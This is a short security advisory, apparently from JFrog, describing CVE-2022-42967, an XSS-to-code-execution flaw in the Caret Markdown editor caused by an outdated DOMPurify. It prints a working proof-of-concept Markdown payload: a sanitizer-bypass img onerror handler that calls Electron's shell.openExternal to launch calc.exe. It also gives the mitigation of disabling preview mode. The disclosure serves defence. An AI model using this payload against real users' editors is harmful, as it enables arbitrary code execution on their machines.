Headline
CVE-2022-42967: Caret XSS RCE |
Caret is vulnerable to an XSS attack when the user opens a crafted Markdown file when preview mode is enabled. This directly leads to client-side code execution.
CVE-2022-42967 | CVSS 7.5
JFrog Severity:high
Published 10 Jan. 2023 | Last updated 10 Jan. 2023
XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files
Caret Editor
All versions are affected
This issue is caused due to insufficient validation of the document data, which is sent to the Electron renderer. Specifically, in the getMarkdownHtmlElement function in the file app.asar/extensions/Markdown/Markdown.js -
t.firstChild.innerHTML = DOMPurify.sanitize®
An older version of DOMPurify is used, which has known filtering bypasses (see below)
Opening a document with the following contents, when preview mode is enabled, leads to the immediate execution of an arbitrary process (in this case - Calculator) -
<form><math><mtext></form><form><mglyph><style></math><img src
onerror="try{ const {shell} = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">
Disable Caret’s “Preview Mode”
NVD